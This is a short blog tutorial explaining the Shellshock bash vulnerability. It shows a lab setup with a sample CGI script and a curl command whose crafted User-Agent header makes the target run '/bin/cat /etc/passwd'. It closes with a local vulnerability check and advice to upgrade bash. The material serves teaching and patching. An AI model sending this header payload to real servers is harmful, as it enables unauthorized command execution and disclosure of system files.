What is Shellshock vulnerability

In This Article

  • This article is about what is the security vulnerability known as shellshock.
  • How an exploit can happen

What is ShellShock vulnerability

ShellShock is a the vulnerability in bash, a most commonly used shell (command line interpreter) programmer in Linux. An exploit of this vulnerability is possible by arbitrary code execution (ACE). Any service in a target system which is pass the arguments from client machine to a bash to process (ex; bash cgi script) could be vulnerable.

A sample exploit

Lets see a sample case of ShellShock exploit

on machine A with bash (currently my bash version is 4.2.39(1) ) and apache server installed (and running)

create file: /var/www/cgi-bin/test.cgi with following content

#!/bin/bash
echo “Content-type: text/plain”
echo
echo
echo “Sample bash CGI script “

and run following commands as root user for providing required permissions to the cgi script

[user@localhost ~]$ chown apache.apache test.cgi

 

[user@localhost ~]$ chmod u+x test.cgi

now from machine B (another Linux box) access http://<machine A ip address>/cgi-bin/test.cgi using a browser and you will see the line “Sample bash CGI script”

now lets try to see the same in command line (shell) on machine B.

[user@localhost ~]$ curl http://<machine A ip address>/cgi-bin/test.cgi

You will see the same “Sample bash CGI script” as the output.

Now, to see the /etc/passwd file which provides all users information in target machine you just have to do the following

[user@localhost ~]$ curl -H “User-Agent:() { :; }; echo;/bin/cat /etc/passwd” http://<machine A ip address>t/cgi-bin/test.cgi

shellshock

What is happening here

When we request a web page, the requesting program (ex: browser) passes URL, the parameters and some header information such as browser name, http version, method (GET/POST) etc. When these parameters are passed from http server to a bash shell program, it parses these argument and the vulnerability makes the arbitrary command part to be get executed in target machine.

Solution

The solution for shellshock is to upgrade to a bash version where this is fixed. To check if your bash is having this vulnerability, use the following command

[user@localhost ~]$ env tst='() { :;}; echo Vulnerable’ bash -c :

If the above command outputs ‘Vulnerable’, your shell program is vulnerable to shellshock attack. If this quits quietly, the installed bash shell is safe.

2 comments

Leave a Reply

Your email address will not be published. Required fields are marked *

nineteen − 12 =